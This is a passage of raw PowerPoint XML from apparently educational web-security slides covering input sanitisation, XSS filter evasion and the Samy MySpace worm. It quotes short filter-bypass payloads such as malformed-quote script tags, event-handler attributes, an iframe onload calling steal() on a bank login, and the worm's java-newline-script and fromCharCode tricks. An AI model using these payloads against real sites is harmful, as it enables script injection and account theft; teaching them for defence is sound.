                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Still remote code execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C861BE1-5E5E-8948-9EEC-03AF79397521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438665" y="4610645"/>
            <a:ext cx="2805984" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Side note: writing a correct regex check is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>very</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321099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91140" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDA245A-B283-9B46-BC1D-348E03BD0212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizing Inputs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2552BB-2BEA-C146-A933-A5243908C8E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963690" y="1000370"/>
            <a:ext cx="6559269" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any user input and client-side data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> be preprocessed before it is used inside HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove / encode (X)HTML special characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use a good escaping library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP ESAPI (Enterprise Security API)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AntiXSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In PHP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(string) will replace all special characters with their HTML codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ becomes &amp;#039;  “ becomes &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;  &amp; becomes &amp;amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In ASP.NET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(string)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51492028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6" name="Rectangle 75">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92162" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E6C1EBB-1057-1749-8EE2-876CDC76EF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Evading </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91B3B37-0E64-E547-AEE3-46294610EE99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4865717" y="559477"/>
            <a:ext cx="7091588" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Preventing injection of scripts into HTML is hard!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Blocking “&lt;” and “&gt;” is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Event handlers, stylesheets, encoded inputs (%3C), etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>phpBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> allowed simple HTML tags like &lt;b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;b c=“&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=“script” x=“&lt;b ”&gt;Hello&lt;b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Beware of filter evasion tricks (XSS Cheat Sheet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>If filter allows quoting (of &lt;script&gt;, etc.), beware of malformed quoting: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Long UTF-8 encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Scripts are not only in &lt;script&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>=`https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/login’ onload=`steal()’&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3490916085"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9556CF9-90E0-604A-8613-3B5BE2F3534D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> Worm (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259523" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19681993-DC1E-8249-8E68-BC8076D08614}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103119"/>
            <a:ext cx="10058400" cy="4281563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Users could post HTML on their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> did not allow scripts in users’ HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>No &lt;script&gt;, &lt;body&gt;, onclick, &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>… but did allow &lt;div&gt; tags for CSS.  K00L!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;div style=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>background:url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> would strip out “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Use “java&lt;NEWLINE&gt;script” instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> would strip out quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Convert from decimal instead:  alert('double quote: ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>String.fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>(34))</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15362" name="Picture 2" descr="Legendary Hacker Samy Kamkar's Advice to Today's Young Hackers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3E2EF7E-341F-1F40-8D8B-0083192D1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5442" y="642594"/>
            <a:ext cx="2518226" cy="18862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D46ADE-BCD5-B44D-B35E-1D077348A40E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10344555" y="2617759"/>
            <a:ext cx="1375698" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Karkar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14620385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595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52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5952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5952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5952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595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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A2341F-7204-AA4E-AC34-AC990F68D73C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>MySpace Worm (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94211" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6EA5CA-A719-AF47-89EF-6C69EA4E9D70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="9568070" cy="4112286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>“There were a few other complications and things to get around. This was not by any means a straight forward process, and none of this was meant to cause any damage or piss anyone off. This was in the interest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>of..interest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>. It was interesting and fun!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Started on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Kamkar’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> page, everybody who visited an infected page became infected and added “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>” as a friend and hero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
